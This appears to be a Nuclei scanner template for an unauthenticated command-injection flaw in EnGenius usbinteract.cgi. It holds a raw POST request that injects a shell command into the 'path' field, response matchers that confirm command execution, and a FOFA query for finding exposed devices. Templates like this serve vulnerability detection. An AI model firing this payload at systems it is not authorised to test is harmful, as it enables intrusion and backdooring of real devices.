http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - uid=
            - gid=
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /web/cgi-bin/usbinteract.cgi HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
          Content-Type: application/x-www-form-urlencoded

          action=7&path="|id||"
id: EnGenius-usbinteract_cgi-rce
info:
    author: Superhero
    description: |-
        fofa: body="/web/images/guest.png" && body="/web/images/admin.png"
        EnGenius usbinteract.cgi接口处存在远程命令执行漏洞，未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: EnGenius usbinteract.cgi 存在未授权远程命令执行
    reference:
        - https://mp.weixin.qq.com/s/ixrAvDm24biDRN6c2jxkNw
    severity: high
    tags: []
